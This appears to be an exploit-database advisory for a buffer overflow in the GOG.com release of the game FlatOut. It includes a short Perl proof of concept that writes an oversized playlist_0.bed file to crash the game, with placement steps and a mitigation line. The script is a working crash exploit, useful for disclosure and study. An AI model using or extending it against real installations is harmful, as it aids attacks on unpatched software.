FlatOut Malformed .bed file Buffer Overflow

vendor:

FlatOut

by:

Silent Dream

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: FlatOut

Affected Version From: Latest

Affected Version To: Latest

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2011

FlatOut Malformed .bed file Buffer Overflow

Multiple .bed files are vulnerable to buffer overflows in the GOG.com copy of FlatOut. An exception offset of 61616161 can be used to overwrite the original playlist_0.bed file in %program files%GOG.comFlatOutdatamusic and launch flatout.exe, resulting in a crash.

Mitigation:

Ensure that all .bed files are validated for proper input before being used.

Source

Exploit-DB raw data:

#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7

#Tested on GOG.com copy of FlatOut.  Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..

my $file = "playlist_0.bed";
my $head = "Title	=	\"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop	= {" . "\r}";
open($File, ">$file");
print $File $head.$junk.$tail;
close($FILE);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";